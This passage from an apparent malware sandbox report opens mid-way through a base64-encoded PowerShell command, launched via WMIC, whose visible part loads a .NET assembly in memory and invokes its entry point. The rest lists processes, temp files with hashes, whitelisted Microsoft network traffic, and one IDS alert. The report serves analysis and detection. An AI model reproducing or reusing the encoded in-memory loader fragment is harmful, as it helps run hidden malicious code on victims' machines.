ICd5JyAtZiAnJylbM10gLWpvaW4gJycpKS5HZXRNZXRob2QoJ0xvYWQnLCBbdHlwZVtdXUAoW2J5dGVbXV0pKTsNCmlmICgkMTJWIC1uZSAkbnVsbCkgew0KJDEyVi5JbnZva2UoJG51bGwsICgsJDZWKSkuRW50cnlQb2ludC5JbnZva2UoJG51bGwsICgsW3N0cmluZ1tdXSgsJDEwVikpKQ0KfQ0KfQ0KfQ0KfQ==" | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8144 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3rhtba2b.g12.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pelhrjx2.vxs.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aou1ljw4.sh4.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qrt3drla.5hn.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tn3sqim5.i2j.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5764 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:5E2F37300ED2DB2B87DA807BC5CBA9B6 | SHA256:06CEF077B19139E160BBBEB28551E1278D04605D241044F3E3D3B291D4EF5265 | |||
| 5764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tikn5ceq.5cm.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6768 | MoUsoCoreWorker.exe | GET | 304 | 4.231.128.59:443 | https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop | US | — | — | whitelisted |
9088 | svchost.exe | GET | 304 | 4.231.128.59:443 | https://settings-win.data.microsoft.com/settings/v3.0/WSD/UpdateHealthTools?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3626&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=SedimentPack&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2 | US | — | — | whitelisted |
5716 | SIHClient.exe | GET | 304 | 135.233.95.144:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | — | — | whitelisted |
5716 | SIHClient.exe | GET | 200 | 135.232.92.97:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | US | — | — | whitelisted |
5716 | SIHClient.exe | GET | 200 | 135.233.95.144:443 | https://slscr.update.microsoft.com/sls/ping | US | — | — | whitelisted |
5716 | SIHClient.exe | GET | 304 | 135.233.95.144:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | — | — | whitelisted |
— | — | GET | 200 | 23.63.118.230:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D | US | binary | 314 b | whitelisted |
— | — | GET | 200 | 204.79.197.203:80 | http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D | US | binary | 959 b | whitelisted |
356 | svchost.exe | GET | 200 | 23.63.118.230:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | binary | 471 b | whitelisted |
9088 | svchost.exe | GET | 200 | 2.16.164.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
9088 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2328 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
6768 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5568 | SearchApp.exe | 184.86.251.12:443 | www.bing.com | AKAMAI-ASN1 | NL | whitelisted |
— | — | 23.63.118.230:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted |
— | — | 204.79.197.203:80 | oneocsp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
3412 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
356 | svchost.exe | 20.190.159.71:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
oneocsp.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
9088 | svchost.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |